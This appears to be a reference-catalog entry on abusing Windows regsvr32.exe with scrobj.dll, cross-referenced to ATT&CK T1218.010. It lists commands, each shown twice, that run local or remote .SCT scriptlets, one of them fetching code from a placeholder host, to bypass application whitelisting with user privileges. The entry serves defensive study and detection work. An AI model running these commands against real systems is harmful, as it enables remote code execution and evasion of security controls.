.. /Regsvr32.exe

Star

Used by Windows to register dlls

• https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
• https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
• https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md

AWL bypass

1. Execute the specified remote .SCT script with scrobj.dll.

   regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

   Use case

   Execute code from remote scriptlet, bypass Application whitelisting

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1218.010

2. Execute the specified local .SCT script with scrobj.dll.

   regsvr32.exe /s /u /i:file.sct scrobj.dll

   Use case

   Execute code from scriptlet, bypass Application whitelisting

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1218.010

Execute

1. Execute the specified remote .SCT script with scrobj.dll.

   regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

   Use case

   Execute code from remote scriptlet, bypass Application whitelisting

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1218.010

2. Execute the specified local .SCT script with scrobj.dll.

   regsvr32.exe /s /u /i:file.sct scrobj.dll

   Use case

   Execute code from scriptlet, bypass Application whitelisting

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1218.010